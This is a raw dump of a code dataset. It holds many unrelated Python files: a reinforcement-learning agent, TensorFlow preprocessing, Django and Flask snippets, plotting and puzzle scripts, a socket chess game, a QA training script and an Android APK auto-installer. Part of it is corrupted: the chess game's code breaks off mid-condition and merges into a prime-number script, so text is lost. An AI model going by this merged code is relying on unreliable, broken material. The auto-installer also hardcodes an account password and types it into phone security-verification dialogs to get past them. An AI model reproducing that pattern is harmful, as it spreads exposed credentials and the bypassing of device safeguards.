self.q_options, self.betas, self.options, self.actions\n        for _ in range(config.rollout_length):\n            var_options = self.network.tensor(options).long()\n            executed_actions = actions[self.network.range(config.num_workers), 
var_options]\n            executed_actions = to_numpy(executed_actions)\n            executed_actions += self.random_process.sample()\n            next_states, rewards, terminals, _ = self.task.step(executed_actions)\n            next_states = self.config.state_normalizer(next_states)\n            self.episode_rewards += rewards\n            rewards = config.reward_normalizer(rewards)\n            rollout.append([states, executed_actions, options, self.prev_options, rewards, 1 - terminals, np.copy(self.is_initial_betas)])\n\n            q_options_next, betas_next, actions_next = self.network.predict(states)\n            self.is_initial_betas = np.asarray(terminals, dtype=np.float32)\n\n            np_q_options_next = to_numpy(q_options_next)\n            np_betas_next = betas_next.gather(1, var_options.unsqueeze(1))\n            np_betas_next = to_numpy(np_betas_next).flatten()\n            options_next = np.copy(options)\n            dice = np.random.rand(len(options_next))\n            for j in range(len(dice)):\n                if dice[j] < np_betas_next[j] or terminals[j]:\n                    options_next[j] = self.policy.sample(np_q_options_next[j])\n\n            for i, terminal in enumerate(terminals):\n                if terminals[i]:\n                    self.last_episode_rewards[i] = self.episode_rewards[i]\n                    self.episode_rewards[i] = 0\n\n            self.prev_options = options\n            options = options_next\n            q_options = q_options_next\n            betas = betas_next\n            actions = actions_next\n            states = next_states\n\n            self.policy.update_epsilon()\n            self.total_steps += config.num_workers\n\n        self.options = options\n        self.q_options = q_options\n        self.betas = betas\n        self.actions = actions\n        self.states = states\n\n        target_q_options, _, _ = self.target_network.predict(next_states)\n\n        prev_options = self.network.tensor(self.prev_options).long().unsqueeze(1)\n        betas_prev_options = betas.gather(1, prev_options)\n\n        returns = (1 - betas_prev_options) * target_q_options.gather(1, prev_options) +\\\n            betas_prev_options * torch.max(target_q_options, dim=1, keepdim=True)[0]\n        returns = returns.detach()\n\n        for i in reversed(range(len(rollout))):\n            states, actions, options, prev_options, rewards, terminals, is_initial_betas = rollout[i]\n\n            is_initial_betas = self.network.tensor(is_initial_betas)\n            prev_options = self.network.tensor(prev_options).unsqueeze(1).long()\n            terminals = self.network.tensor(terminals).unsqueeze(1)\n            rewards = self.network.tensor(rewards).unsqueeze(1)\n            returns = rewards + config.discount * terminals * returns\n\n            phi = self.network.feature(states)\n            actions = self.network.tensor(actions)\n            q_options = self.network.critic(phi, actions)\n            betas = self.network.termination(phi)\n            if not config.off_policy_critic:\n                q = q_options[self.network.tensor(np.arange(q_options.size(0))).long(),\n                              self.network.tensor(options).long()].unsqueeze(-1)\n            else:\n                q = q_options\n            q_loss = (q - returns).pow(2).mul(0.5).sum(1).mean()\n\n            q_prev_omg = q_options.gather(1, prev_options)\n            v_prev_omg = torch.max(q_options, dim=1, keepdim=True)[0]\n            advantage_omg = q_prev_omg - v_prev_omg\n            advantage_omg.add_(config.termination_regularizer).detach()\n            betas = betas.gather(1, prev_options)\n            betas = betas * (1 - is_initial_betas)\n            beta_loss = (betas * advantage_omg).mean()\n\n            self.network.zero_grad()\n            (q_loss + beta_loss * config.beta_loss_weight).backward()\n            self.network.critic_opt.step()\n\n            phi = self.network.feature(states)\n            actions = self.network.actor(phi)\n            q = self.network.critic(phi.detach(), actions)\n            if not config.off_policy_actor:\n                q = q[self.network.tensor(np.arange(q.size(0))).long(),\n                      self.network.tensor(options).long()].unsqueeze(-1)\n            policy_loss = -q.sum(1).mean()\n\n            self.network.zero_grad()\n            policy_loss.backward()\n            
self.network.actor_opt.step()\n\n        self.soft_update(self.target_network, self.network)\n","sub_path":"deep_rl/agent/DOC_agent.py","file_name":"DOC_agent.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"249341383","text":"import sqlite3\n\ndef create():\n    try:\n        c.execute(\"\"\"CREATE TABLE mytable\n                (start, end, score)\"\"\")\n    except:\n        pass\n\ndef insert():\n    c.execute(\"\"\"INSERT INTO mytable (start, end, score)\n              values(1, 99, 123)\"\"\")\n\ndef select(verbose=True):\n    sql = \"SELECT * FROM mytable\"\n    recs = c.execute(sql)\n    if verbose:\n        for row in recs:\n            print(row)\n\ndb_path = r'/Users/travispbonfigli/bin/PYTHON/INE/inventory.db'\nconn = sqlite3.connect(db_path)\nc = conn.cursor()\ncreate()\ninsert()\nconn.commit() #commit needed\nselect()\nc.close()\n","sub_path":"junk2dbfile.py","file_name":"junk2dbfile.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"247302126","text":"import tensorflow as tf\n\nimport augment_volume_util as avu\n\n#TODO: 3D label stuff for seg, target_image_size is 1 int, can be list for !square images\ndef preprocess_for_train(volume,\n        num_frames,\n        height,\n        width,\n        target_image_size,\n        list_of_augmentations=[]):\n\n    '''Preprocessing volumes during training.\n    Args:\n        volume: '4D Tensor' [depth, height, width, channels]\n        target_image_size: 'Integer' to specify input size\n            required by the model\n        list_of_augmentations: 'List' of strings specifying\n            augmentations to be done\n    Returns:\n        Augmented '4D Tensor of same dtype as :volume\n    '''\n\n    get_shape = volume.get_shape().as_list()\n    assert len(get_shape) == 4, 'Input shape length should be\\\n        4. Found %d' %len(get_shape)\n    if len(list_of_augmentations) == 0:\n        print('No augmentations mentioned, function will return\\\n            volume unchanged')\n    \n    ##### Random cropping\n    target_dims = [\n        num_frames,\n        target_image_size,\n        target_image_size,\n        3]\n\n    if 'random_crop' in list_of_augmentations:\n        volume = avu.random_crop_volume(\n            volume=volume,\n            target_dims=target_dims)\n\n\n    '''\n    ##### Random flipping\n    if 'random_flip' in list_of_augmentations:\n        volume = avu.random_flip(\n            volume=volume,\n            direction='lr')\n    '''\n\n    ##### Brightness in range [0.0, 0.3)\n    if 'random_brightness' in list_of_augmentations:\n        volume = avu.apply_brightness(\n            volume=volume)\n\n    ##### Contrast in range [0.0, 0.3)\n    if 'random_contrast' in list_of_augmentations:\n        volume = avu.apply_contrast(\n            volume=volume)\n\n    return volume\n\n\ndef preprocess_for_eval(volume,\n        num_frames,\n        height,\n        width,\n        target_image_size,\n        list_of_augmentations=[]):\n\n    \n    ##### Crop center 224*224 patch\n    #height, width = get_shape[1], get_shape[2]\n    center_x = tf.cast(\n        tf.divide(\n            height\n            if type(height) == int else height[0],\n            2),\n        tf.int32)\n\n    center_y = tf.cast(\n        tf.divide(\n            width\n            if type(width) == int else width[0],\n            2),\n        tf.int32)\n\n    offset_height = tf.subtract(\n        center_x,\n        112)\n    offset_width = tf.subtract(\n        center_y,\n        112)\n    target_height, target_width = target_image_size,\\\n        target_image_size\n    volume = tf.image.crop_to_bounding_box(\n        volume,\n        offset_height,\n        offset_width,\n        target_height,\n        target_width)\n\n    # for testing ucf-101. 
comment otherwise\n    #volume = tf.slice(\n    #    volume,\n    #    [0, 0, 0, 0],\n    #    [64, 224, 224, 3])\n    \n    return volume\n\n\ndef preprocess_volume(volume,\n        num_frames,\n        height,\n        width,\n        is_training=False,\n        target_image_size=224,\n        use_bfloat16=False,\n        list_of_augmentations=[]):\n\n    '''Preprocess the given image.\n\n    Args:\n        1. volume: Tensor representing an uint\\\n            volume of arbitrary size\n        2. height: Tensor representing the original\\\n            height of the volume\n        3. width: Tensor representing the original\\\n            width of the volume\n        4. is_training: bool for whether the\\\n            preprocessing is for training\n        5. target_image_size: int for representing input\\\n            size to the model\n        6. num_frames: int for representing the\\\n            number of frames in a volume\n        7. use_bfloat16: bool for whether to use\\\n            bfloat16\n        8. list_of_augmentations: Specify augmentation\\\n            schemes\n    \n    Returns:\n        A preprossed image Tensor with value range\\\n            of [-1, 1].\n    '''\n    \n    # Get back actual volume shape\n    if is_training:\n        volume = tf.reshape(\n            volume,\n            [\n                num_frames,\n                height,\n                width,\n                3])\n    else:\n        volume = tf.reshape(\n            volume,\n            [\n                num_frames,\n                height,\n                width,\n                3])\n\n    if is_training:\n        func = preprocess_for_train\n    else:\n        func = preprocess_for_eval\n\n    volume = func(\n        volume,\n        num_frames,\n        height,\n        width,\n        target_image_size,\n        list_of_augmentations)\n    \n    ##### Cast volume to float32\n    volume = tf.cast(\n        volume,\n        tf.float32)\n\n    ##### I3d takes input in range [-1, 1]\n    volume = tf.subtract(\n        tf.divide(\n            volume,\n            tf.constant(\n                127.5,\n                dtype=tf.float32)),\n        tf.constant(\n            1.,\n            dtype=tf.float32))\n\n    if use_bfloat16:\n        ##### Conversion to bfloat16\n        volume = tf.image.convert_image_dtype(\n            volume,\n            dtype=tf.bfloat16)\n\n    return volume\n","sub_path":"action_recog/central_reservoir/augmentations/preprocessing_volume.py","file_name":"preprocessing_volume.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"1981866","text":"import cv2\r\nimport numpy as np\r\n\r\nwidth = 256\r\nheight = 256\r\n\r\n# uint8で0埋めの配列を作る。\r\n# 幅16、高さ24のサイズ\r\n# zeros(shape, type) shapeは配列の大きさ\r\n# 配列の(行数、列数)になっている\r\n# 画像はwidth,heightの慣習があるが、ココは逆なので気をつけること\r\nimageArray = np.zeros((height, width, 3), np.uint8)\r\nimageArray+=255\r\n# これでサイズを確認できます\r\n\r\nsize = imageArray.shape[:2]\r\nprint(size)\r\n\r\n\r\n# 0で埋められた配列を画像として保存します\r\ncv2.imwrite(\"white.png\", imageArray);\r\n","sub_path":"white.py","file_name":"white.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"330799453","text":"from django.contrib import admin\nfrom polymorphic.admin import PolymorphicParentModelAdmin, \\\n    PolymorphicChildModelAdmin\nfrom fabled.course.models import *\n\nclass TextBlockAdmin(PolymorphicChildModelAdmin):\n    base_model = TextBlock\n\nclass ImageBlockAdmin(PolymorphicChildModelAdmin):\n    base_model = ImageBlock\n\nclass BlockParentAdmin(PolymorphicParentModelAdmin):\n    base_model = Block\n    child_models = (\n        (TextBlock, TextBlockAdmin),\n        (ImageBlock, ImageBlockAdmin)\n    )\n\nadmin.site.register(Block, BlockParentAdmin)\nadmin.site.register(Course)\n","sub_path":"fabled/course/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"114597659","text":"from flask import url_for\nfrom tests.base import BaseTestCase\n\n\nclass 
MainTestCase(BaseTestCase):\n    def test_index(self):\n        response = self.client.get(url_for('main.index'))\n        data = response.get_data(as_text=True)\n        self.assertIn('登录', data)\n\n        self.login()\n        response = self.client.get(url_for('main.index'))\n        data = response.get_data(as_text=True)\n        self.assertNotIn('登录', data)\n","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"232560496","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import cm\nfrom matplotlib.patches import ConnectionPatch\n\n#%% Class for Fourier Series\n\nclass FS():\n    \n    def __init__(self, Circles, Cycles):\n        \n        self.Circles = Circles\n        self.Cycles = Cycles\n    \n    #%% X coordinate of circle's center\n    \n    def Xcenter(self, n, theta):\n        \n        ''' \n        X coordinate of n th circle\n        '''\n        \n        Ans = 0\n        \n        if n > 0:\n            for i in range(1, n + 1):\n                Ans += (4/( (2*i - 1)* np.pi))* np.cos( (2*i - 1)* theta)\n        \n        return Ans\n    \n    #%% Y coordinate of circle's center\n    \n    def Ycenter(self, n, theta):\n        \n        ''' \n        Y coordinate of n th circle\n        '''\n        \n        Ans = 0\n        \n        if n > 0:\n            for i in range(1, n + 1):\n                Ans += (4/( (2*i - 1)* np.pi))* np.sin( (2*i - 1)* theta)\n        \n        return Ans\n    \n    #%% Radius of circle\n    \n    def Rds(self, n):\n        \n        ''' \n        Radius of n th circle\n        '''\n        \n        return 4/( (2*n + 1)* np.pi)\n    \n    #%% Plot\n    \n    def PlotFS(self):\n\n        time = np.linspace(0, self.Cycles, self.Cycles* 70)\n        \n        fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(80, 60))\n        fig.suptitle('Fourier Series', fontsize = 45, fontweight = 'bold')\n        \n        color = cm.rainbow( np.linspace(0, 1, self.Circles) )\n        \n        for t in time:\n            \n            thta = 2* np.pi* t\n            \n            #%% clear the plot\n            axs[0].clear()\n            \n            if (t > 0):\n                con.remove()\n            \n            #%% First plot\n            \n            for i, c in zip(range(0, self.Circles), color):\n                xc = self.Xcenter(i, thta)\n                yc = self.Ycenter(i, thta)\n                R = self.Rds(i)\n                \n                crl = plt.Circle((xc, yc), R, color=c, alpha = 0.5, linewidth = 2)\n                axs[0].add_artist(crl)\n                \n                if (i > 0):\n                    axs[0].plot([xco, xc], [yco, yc], color='b', linewidth = 2)\n                \n                xco = xc\n                yco = yc\n                Ro = R\n            \n            axs[0].axis('square')\n            axs[0].set_xlim([ -9/np.pi, 9/np.pi ])\n            axs[0].set_ylim([ -9/np.pi, 9/np.pi ])\n            \n            #%% Second plot\n            \n            if (t > 0):\n                axs[1].plot([to,t], [ycirc, yc], color='m', linewidth = 1.5)\n            \n            to = t\n            ycirc = yc\n            \n            axs[1].axis('square')\n            axs[1].set_xlim([ 0, 18/np.pi ])\n            axs[1].set_ylim([ -9/np.pi, 9/np.pi ])\n            \n            #%% Line\n            \n            con = ConnectionPatch( xyA = (t, yc), xyB = (xc, yc), \n                                   coordsA = 'data', coordsB = 'data',\n                                   axesA = axs[1], axesB = axs[0], \n                                   color = 'red')\n            axs[1].add_artist(con)\n            \n            plt.pause(1e-11)\n\n#%% Main\n\nif __name__ == '__main__':\n    \n    # Circles, Cycles\n    fs = FS(8, 2)\n    fs.PlotFS()\n","sub_path":"Physics/FS_square.py","file_name":"FS_square.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"21597781","text":"class Solution:\n    def reorderLogFiles(self, logs: List[str]) -> List[str]:\n        \n        digit_logs = [i for i in logs if not i.split()[1][0].isalpha()] #split(\"\",1)\n        letter_logs = [i for i in logs if i.split()[1][0].isalpha()]\n        \n        sort = []\n        for i in letter_logs:\n            a = i.split()\n            b = a[1:] + [a[0]] # tuple 로 감싸면 어짜피 앞에서부터 비교한다.\n            c = ' '.join(b)\n            sort.append(c)\n        \n        sort.sort() # linting? sort를 변수로 쓰면 안됨. pep8 표준에 맞는 스타일. 
black app , linter : \n # typechecking, 안쓰는 변수, 밖에서 변수 호출 // flake8 pyiint mypy\n # python typing pep484\n \n answer = []\n \n for i in sort:\n a = i.split()\n b = [a[-1]] + a[:-1]\n c = ' '.join(b)\n answer.append(c)\n \n answer = answer + digit_logs\n \n return answer\n\n # 황규님 솔루션 보기, None도 안써도 괜찮음.\n # 스트링 사이즈에 따라서 NlogN이 아닐 수 있음.\n # 수진님 솔루션 보기\n # 원탁님 솔루션 비교\n # 진우님 솔루션이 최적화\n","sub_path":"LeetCode/Reorder Data in Log Files.py","file_name":"Reorder Data in Log Files.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"11349293","text":"#ITERATIVE PROGRAM\nimport re\ndef iterative_program():\n \"\"\"main function which has the core program (should be broken into smaller functions)\"\"\"\n user_input = re.sub( r'[^A-Za-z]', '', str(input(\"Please enter some text to check if it is a palindrome: \")))\n user_input_length = len(user_input)\n user_input_reverse = \"\"\n print(\"this is the ITERATIVE program!\")\n for counter in range(0, (user_input_length*-1)-1,-1):\n if counter == 0:\n user_input_reverse += user_input[-1:]\n elif counter == -1:\n continue\n else:\n user_input_reverse += user_input[counter: counter+1]\n theoretical_math_piece = ((str(str(re.match(str(user_input), str(user_input_reverse)))[24:34])) + \" )\")#the match reg ex function is applied to both the actual text and the reversed text and it compares the two and returns a math object based off of the result# after i recieve the math object i take out the span part of the object which looks similar to this <_sre.SRE_Match object; span=(4, 11), match='message'>\n actual_math_piece = (\"span=(0, \"+str(user_input_length)+\" )\")#this is the span part that should be generated if text is palandromic\n print(\"thats a palindrome!\") if actual_math_piece == theoretical_math_piece else print(\"nope that is not a palindrome!\")\niterative_program()\n\n#RECURSIVE PROGRAM\ndef recrursive_program():\n \"\"\"main function which has the core program\"\"\"\n counter = 0\n user_input = re.sub( r'[^A-Za-z]', '', str(input(\"Please enter some text to check if it is a palindrome: \")))\n user_input_reverse = \"\"\n user_input_length = len(user_input)\n print(\"this is the RECURSIVE program!\")\n def reverse_string(counter2, user_input2, user_input_reverse2, user_input_length2):\n \"\"\"this function reverses the string the user provides\"\"\"\n if counter2 == 0:\n user_input_reverse2 += user_input2[-1:]\n elif counter2 == -1:\n user_input_reverse2 = user_input_reverse2\n else:\n user_input_reverse2 = user_input_reverse2+user_input2[counter2: counter2+1]\n\n if counter2 >= ((user_input_length2*-1)+1):#BASE CASE\n reverse_string(counter2 - 1,user_input2, user_input_reverse2, user_input_length2)\n else:\n calculate_if_palindrome(counter2, user_input2, user_input_reverse2, user_input_length2)\n\n def calculate_if_palindrome(counter3, user_input3, user_input_reverse3, user_input_length3):\n \"\"\"this function compares the two strings that the user provides by using reg ex methods\"\"\"\n theoretical_math_piece = ((str(str(re.match(str(user_input3), str(user_input_reverse3)))[24:34])) + \" )\")#the match reg ex function is applied to both the actual text and the reversed text and it compares the two and returns a math object based off of the result# after i recieve the math object i take out the span part of the object which looks similar to this <_sre.SRE_Match object; span=(4, 11), match='message'>\n actual_math_piece = (\"span=(0, 
\"+str(user_input_length3)+\" )\")#this is the span part that should be generated if text is palandromic\n print(\"thats a palindrome!\") if actual_math_piece == theoretical_math_piece else print(\"nope that is not a palindrome!\")\n\n reverse_string(counter, user_input, user_input_reverse, user_input_length)\nrecrursive_program()\n","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"191485607","text":"from setuptools import setup\n\n# these lines allow the version to be specified in Makefile.private\nimport os\nversion = os.environ.get(\"MODULEVER\", \"0.0\")\n\nsetup(\n# install_requires = ['cothread'], # require statements go here\n name = 'dls_pi_piezo_scan',\n version = version,\n description = 'Module',\n author = 'tdq39642',\n author_email = 'tdq39642@fed.cclrc.ac.uk',\n packages = ['dls_pi_piezo_scan'],\n# entry_points = {'console_scripts': ['test-python-hello-world = dls_pi_piezo_scan.dls_pi_piezo_scan:main']}, # this makes a script\n# include_package_data = True, # use this to include non python files\n zip_safe = False\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"591317332","text":"import socket\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nimport os\nimport pprint\nfrom pprint import pprint\nimport gen_key\nfrom Crypto.PublicKey import RSA\n\n\nroot = Tk()\n\nimage_size = 64\n\nuser_player = None \t#Host plays white\n\t\t\t#White goes first\n\t\t\t#White plays from bottom (len(board)) to top (0).\n\n\n\n\nclass Board:\n\tdef __init__(self):\n\t\tself.canvas = Canvas(root, width=image_size*8, height=image_size*8)\n\t\tself.canvas.pack()\n\t\tself.canvas.bind(\"\",self.mouse_action)\n\n\t\tself.turn_text = Label(root,text = \"ERROR\")\n\t\tself.turn_text.pack()\n\n\t\tself.board = [[None]*8 for i in range(8)]\t#Note that the board is a list of lists\n\t\t\t\t\t\t\t\t#This means that the Y coordinates are the first coordinate of board\n\t\t\t\t\t\t\t\t#The X coordinate is the second coordinate of the board\n\t\t\t\t\t\t\t\t#A Y coordinate of 0 is the top\n\t\t\t\t\t\t\t\t#A Y coordinate of 7 is the bottom\n\t\t\t\t\t\t\t\t#Decreasing Ys moves the piece UP\n\t\t\n\t\tself.board[0][0] = Rook(\"guest\",(0,0))\n\t\tself.board[0][1] = Knight(\"guest\",(1,0))\n\t\tself.board[0][2] = Bishop(\"guest\",(2,0))\n\t\tself.board[0][3] = Queen(\"guest\",(3,0))\n\t\tself.board[0][4] = King(\"guest\",(4,0))\n\t\tself.board[0][5] = Bishop(\"guest\",(5,0))\n\t\tself.board[0][6] = Knight(\"guest\",(6,0))\n\t\tself.board[0][7] = Rook(\"guest\",(7,0))\n\t\t\n\t\tfor x in range(8):\n\t\t\tself.board[1][x] = Pawn(\"guest\",(x,1))\n\n\t\tself.board[7][0] = Rook(\"host\",(0,7))\n\t\tself.board[7][1] = Knight(\"host\",(1,7))\n\t\tself.board[7][2] = Bishop(\"host\",(2,7))\n\t\tself.board[7][3] = Queen(\"host\",(3,7))\n\t\tself.board[7][4] = King(\"host\",(4,7))\n\t\tself.board[7][5] = Bishop(\"host\",(5,7))\n\t\tself.board[7][6] = Knight(\"host\",(6,7))\n\t\tself.board[7][7] = Rook(\"host\",(7,7))\n\n\t\tfor x in range(8):\n\t\t\tself.board[6][x] = Pawn(\"host\",(x,6))\n\n\t\tself.guest_pieces = [self.board[i][j] for i in range(2) for j in range(8)]\n\t\tself.host_pieces = [self.board[6+i][j] for i in range(2) for j in range(8)]\n\t\t\n\t\tself.guest_king = self.board[0][4]\n\t\tself.host_king = 
self.board[7][4]\n\t\t\n\t\tself.selected_piece = None\n\t\tself.selected_image = ImageTk.PhotoImage(Image.open(\"../res/selected.png\").resize((image_size,image_size), Image.ANTIALIAS))\n\n\t\tself.move_coords = []\n\n\t\tself.redraw()\n\t\tif user_player == \"guest\":\n\t\t\tmove = link.get_move()\n\t\t\tself.move_piece(move[0],move[1])\n\t\t\tself.redraw()\n\t\t\tself.turn_text.config(text='Turn: You (Black')\n\t\telse:\n\t\t\tself.turn_text.config(text='Turn: You (White)')\n\n\n\tdef pieceAtLoc(self,piece,pos):\n\t\tif not (pos[0]>=0 and pos[0]=0 and pos[1]prime :\n condition = True\n print (i)\n for j in range(2,i):\n if i%j==0:\n condition = False\n if condition:\n prime = i\n\nprint(prime)\n","sub_path":"problem003.py","file_name":"problem003.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"203787925","text":"import argparse\nimport os\nimport time\nfrom logging import FileHandler\n\nfrom language.qa.dataset import build_dataset\nfrom language.qa.model import build_model\nfrom language.qa.utils.trainer import Trainer\nfrom language.qa.utils.evaluator import Evaluator\nfrom language.utils.log import get_logger\nfrom language.utils.config import get_cfg_defaults\nfrom language.utils.serialization import load_model\n\n\nlogger = get_logger()\n\n\ndef load_pretrain_model(model, pretrain_cfg):\n if pretrain_cfg is None:\n return model\n\n if 'resume' in pretrain_cfg:\n load_model(model, pretrain_cfg.resume, resume=True)\n elif 'load' in pretrain_cfg:\n load_model(model, pretrain_cfg.load)\n elif 'bert' in pretrain_cfg:\n model.load_bert_model(pretrain_cfg.bert)\n\n return model\n\n\ndef train(cfg):\n train_dataset = build_dataset(cfg.data, purpose='train')\n val_dataset = build_dataset(cfg.data, purpose='val')\n model = build_model(cfg.model, vocab=train_dataset.get_vocab())\n load_pretrain_model(model, cfg.pretrain)\n evaluator = Evaluator(cfg.evaluator, val_dataset)\n Trainer(cfg.trainer, evaluator, model, train_dataset, cfg.save.dir).train()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Train question answer model.')\n parser.add_argument('--config', required=True, type=str, help='Path to config.')\n args = parser.parse_args()\n\n cfg = get_cfg_defaults()\n cfg.merge_from_file(args.config)\n cfg.save.dir = os.path.join(cfg.save.dir, time.strftime(\"%Y%m%d%H%M%S\"))\n os.makedirs(cfg.save.dir, exist_ok=True)\n cfg.freeze()\n\n logger.addHandler(FileHandler(os.path.join(cfg.save.dir, f'train.log')))\n logger.info(f'Loading config {args.config}.')\n logger.info(f'Config:\\n {cfg}')\n train(cfg)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/train_qa.py","file_name":"train_qa.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"114200927","text":"import os\nimport time\nfrom multiprocessing import Pool\nimport uiautomator2 as u2\nimport subprocess\n\n\ndef conndevice(device):\n d = u2.connect(device)\n return d\n\n\n\ndef getDevicesAll():\n # 获取devices数量和名称\n devices = []\n try:\n for dName_ in os.popen(\"adb devices\"):\n if \"\\t\" in dName_:\n if dName_.find(\"emulator\") < 0:\n devices.append(dName_.split(\"\\t\")[0])\n devices.sort(cmp=None, key=None, reverse=False)\n print(devices)\n except:\n pass\n print(u\"\\n设备名称: %s \\n总数量:%s台\" % (devices, len(devices)))\n return devices\n\n\ndef check_screen_locked(device, d, times=1):\n try:\n if times >= 3:\n return 
False\n print('({}) <尝试{}次> 检查设备是否锁屏'.format(device, times))\n if d.info.get('screenOn') == True:\n print('({}) 设备是亮屏状态!'.format(device))\n d.press(\"power\")\n print('({}) 关闭屏幕一次!'.format(device))\n time.sleep(2)\n d.unlock()\n print('({}) 执行一次解锁'.format(device))\n d.press(\"home\")\n print('({}) 按一次home回到桌面'.format(device))\n return True\n else:\n print('({}) 设备是黑屏状态!'.format(device))\n d.unlock()\n print('({}) 直接执行解锁'.format(device))\n d.press(\"home\")\n print('({}) 按一次home回到桌面'.format(device))\n return True\n except Exception as e:\n print(e)\n return check_screen_locked(times=times + 1)\n\n\ndef input_autoinstall(device, d):\n try:\n devices_v = d.device_info[\"version\"]\n devices_version = devices_v[0:3]\n display = d.device_info[\"display\"]\n my_display = '{}*{}'.format(display[\"width\"], display[\"height\"])\n print('当前手机系统版本为 {}'.format(devices_version))\n print('检测是否是vivo或者OPPO手机 {}'.format(device))\n print('当前屏幕分辨率为 {}'.format(my_display))\n if d.device_info[\"brand\"] == 'vivo':\n print('检测到vivo手机 {}'.format(device))\n if float(devices_version) > 5 and float(devices_version) < 9:\n d(resourceId=\"vivo:id/vivo_adb_install_ok_button\").click()\n else:\n print('开始输入密码 {}'.format(device))\n d.xpath(\n '//*[@resource-id=\"com.bbk.account:id/dialog_pwd\"]/android.widget.LinearLayout[1]/android.widget.RelativeLayout[1]').set_text(\n \"Pokercity2019\")\n print('点击确认按钮 {}'.format(device))\n d(resourceId=\"android:id/button1\").click()\n print('等待10s检测应用安全性 {}'.format(device))\n d(resourceId=\"com.sohu.inputmethod.sogou.vivo:id/imeview_keyboard\").wait(timeout=10.0)\n print('点击安装按钮 {}'.format(device))\n d.click(0.497, 0.858)\n return True\n elif d.device_info[\"brand\"] == 'OPPO':\n print('检测到OPPO手机 {}'.format(device))\n print('开始输入密码 {}'.format(device))\n d(resourceId=\"com.coloros.safecenter:id/et_login_passwd_edit\").set_text(\"Pokercity2019\")\n print('点击确认按钮 {}'.format(device))\n d(resourceId=\"android:id/button1\").click()\n print('等待8s检测应用安全性 {}'.format(device))\n time.sleep(8)\n if d(text=\"发现广告插件\").exists:\n d.click(0.686, 0.929)\n time.sleep(2)\n d.click(0.482, 0.84)\n return True\n else:\n if float(devices_version) > 5 and float(devices_version) < 7:\n d.click(0.718, 0.957)\n return True\n elif float(devices_version) > 8 and float(devices_version) < 11:\n d.click(0.495, 0.954)\n return True\n elif float(devices_version) < 5.3 and float(devices_version) >= 5:\n d.click(0.498, 0.793)\n return True\n else:\n return True\n else:\n return True\n except Exception as e:\n print(e)\n return False\n\n\ndef quickinstall(device):\n packagename = \"com.saiyun.vtmjzz\"\n i = \"/Users/boke/Downloads/apk/mjzz_release_1.07_0727-appetizer.apk\"\n\n cmd = '{} -s {} {} {}'.format(\"adb\", device, \"install\", i)\n print(cmd)\n\n # 卸载原有apk\n d = u2.connect(device)\n try:\n os.system('adb -s ' + device + ' uninstall %s' % packagename)\n print(device + \" 卸载成功\\n\")\n except:\n print(device + \" 卸载失败\\n\")\n check_screen_locked(device, d)\n subprocess.Popen(cmd, shell=True)\n time.sleep(10)\n input_autoinstall(device, d)\n\n\n\n\ndef qainstall(devices):\n starting = time.time()\n pool = Pool() # 创建8个任务池\n result = pool.map(quickinstall, devices)\n entire = time.time()\n pool.close()\n print(entire - starting) # 打印时间\n\n\nif __name__ == \"__main__\":\n try:\n devices = getDevicesAll()\n except:\n print(\"获取设备出错\")\n try:\n qainstall(devices)\n except:\n 
print(\"进程出错\")\n","sub_path":"auto_install.py","file_name":"auto_install.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"231738827","text":"\ndef in_notebook():\n '''Simple function to check if module is loaded in a notebook'''\n try:\n __IPYTHON__\n return True\n except NameError:\n return False\n\n#Global variable to keep track of whether the output_notebook command was run \nbokeh_ouput_notebook_called = False\nmpl_ouput_notebook_called = False \n\ndef mpl_output_notebook():\n from IPython import get_ipython\n ipython = get_ipython()\n #ipython.magic('matplotlib inline')\n mpl_ouput_notebook_called = True\n\n#These are used for checking whether something is an instance of\n#an array or a number.\nimport numpy as np\nnumber_types = (int, float, np.int8, np.int16, np.int32, np.int64,\\\n np.uint8, np.uint16, np.uint32, np.uint64,\\\n np.float16, np.float32, np.float64\\\n )\nint_types = (int, np.int8, np.int16, np.int32, np.int64,\\\n np.uint8, np.uint16, np.uint32, np.uint64\\\n )\narray_types = (tuple, list, np.ndarray)","sub_path":"qexpy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"441441793","text":"import requests\nimport re\nimport os\nimport time\nimport random\n\nfrom fake_useragent import UserAgent\nfrom concurrent.futures import 